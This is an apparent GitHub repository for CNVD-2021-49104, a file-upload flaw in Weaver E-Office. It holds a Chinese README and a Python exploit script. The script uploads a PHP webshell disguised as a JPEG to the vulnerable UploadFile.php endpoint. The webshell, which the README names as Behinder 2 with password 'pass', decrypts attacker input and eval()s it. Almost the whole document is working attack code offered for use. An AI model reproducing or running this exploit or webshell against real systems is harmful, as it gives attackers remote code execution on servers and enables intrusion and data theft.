├── 1.png
├── README.md
└── e-oeffice.py


/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bigsizeme/CNVD-2021-49104/HEAD/1.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CNVD-2021-49104
2 | CNVD-2021-49104——泛微E-Office文件上传漏洞
3 | 挂马为冰蝎2 密码 pass
4 | 使用方法如图
5 | 
6 | 
7 | 
8 | ![Alt text](https://github.com/bigsizeme/CNVD-2021-49104/blob/main/1.png)
9 | 


--------------------------------------------------------------------------------
/e-oeffice.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | # -*- coding:utf-8 -*-
  3 | import requests
  4 | import sys
  5 | import json
  6 | import os
  7 | import time
  8 | import string
  9 | import argparse
 10 | import readchar
 11 | import random
 12 | from requests_toolbelt.multipart.encoder import MultipartEncoder
 13 | 
 14 | 
 15 | banner ='''     
 16 |  ______           ______  ______  ______  ________  ______  ______      
 17 | /_____/\         /_____/\/_____/\/_____/\/_______/\/_____/\/_____/\     
 18 | \::::_\/_  ______\:::_ \ \::::_\/\::::_\/\__.::._\/\:::__\/\::::_\/_    
 19 |  \:\/___/\/______/\:\ \ \ \:\/___/\:\/___/\ \::\ \  \:\ \  _\:\/___/\   
 20 |   \::___\/\__::::\/\:\ \ \ \:::._\/\:::._\/ _\::\ \__\:\ \/_/\::___\/_  
 21 |    \:\____/\        \:\_\ \ \:\ \   \:\ \  /__\::\__/\\:\_\ \ \:\____/\ 
 22 |     \_____\/         \_____\/\_\/    \_\/  \________\/ \_____\/\_____\/ 
 23 |                                                                  
 24 |                                                         https://github.com/bigsizeme/                                                        
 25 |                                                         '''
 26 | print(banner)
 27 | proxies = {'http': 'http://127.0.0.1:8099', 'https': 'http://127.0.0.1:8099'}
 28 | 
 29 | def random_string_generator(str_size, allowed_chars):
 30 |     return ''.join(random.choice(allowed_chars) for x in range(str_size))
 31 | chars = string.ascii_letters
 32 | 
 33 | 
 34 | def getPath(url):
 35 |     if '://' not in url:
 36 |         target = 'https://%s' % url if ':443' in url else 'http://%s' % url
 37 |     else:
 38 |         target = url
 39 |     temp = "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
 40 |     target = url+temp
 41 |     shellCode = '''<?php
 42 | @error_reporting(0);
 43 | session_start();
 44 | if (isset($_GET['pass']))
 45 | {
 46 |     $key=substr(md5(uniqid(rand())),16);
 47 |     $_SESSION['k']=$key;
 48 |     print $key;
 49 | }
 50 | else
 51 | {
 52 |     $key=$_SESSION['k'];
 53 | 	$post=file_get_contents("php://input");
 54 | 	if(!extension_loaded('openssl'))
 55 | 	{
 56 | 		$t="base64_"."decode";
 57 | 		$post=$t($post."");
 58 | 		
 59 | 		for($i=0;$i<strlen($post);$i++) {
 60 |     			 $post[$i] = $post[$i]^$key[$i+1&15]; 
 61 |     			}
 62 | 	}
 63 | 	else
 64 | 	{
 65 | 		$post=openssl_decrypt($post, "AES128", $key);
 66 | 	}
 67 |     $arr=explode('|',$post);
 68 |     $func=$arr[0];
 69 |     $params=$arr[1];
 70 | 	class C{public function __construct($p) {eval($p."");}}
 71 | 	@new C($params);
 72 | }
 73 | ?>'''
 74 |     headers = {'Content-Type': 'multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','X-Requested-With':'XMLHttpRequest','Content-Length':'606'}
 75 | 
 76 |     multipart_encoder = MultipartEncoder(
 77 |         fields={
 78 |             "Filedata": (
 79 |             "b.php", shellCode, 'image/jpeg'),
 80 |             "typeStr": "File"
 81 |         },
 82 |         boundary='e64bdf16c554bbc109cecef6451c26a4'
 83 |     )   
 84 |     response = requests.post(url=target,headers=headers,data=multipart_encoder,proxies=proxies,verify=False)
 85 | 
 86 |     if response.status_code ==200:
 87 |         null =""
 88 |         text =response.text
 89 |         print(text)
 90 |         return text
 91 |     else:
 92 |         print("error")
 93 | 
 94 | 
 95 | def parse_args():
 96 |     # parse the arguments
 97 |     parser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + sys.argv[0] + " -u target")
 98 |     parser._optionals.title = "OPTIONS"
 99 |     parser.add_argument('-u', '--url', help="Target url.", default="http://127.0.0.1:8080", required=True)
100 |     parser.add_argument('-c', '--cmd', help="Commond", default="whoami", required=False)
101 |     return parser.parse_args()
102 | 
103 | if __name__ == '__main__':
104 |     args = parse_args()
105 |     url = args.url
106 |     if url.endswith("/"):
107 |         url = url[:-1]
108 |         print(url)
109 |     cmd = args.cmd
110 |     path = getPath(url)
111 |     if path=='logo-eoffice.php':
112 |         print("shell path: "+url+"/images/logo/logo-eoffice.php?pass")
113 |    # print("\nvul:%s url:%s\t\n" %(str(r["vul"]),url))
114 | 
115 | 
116 | 


--------------------------------------------------------------------------------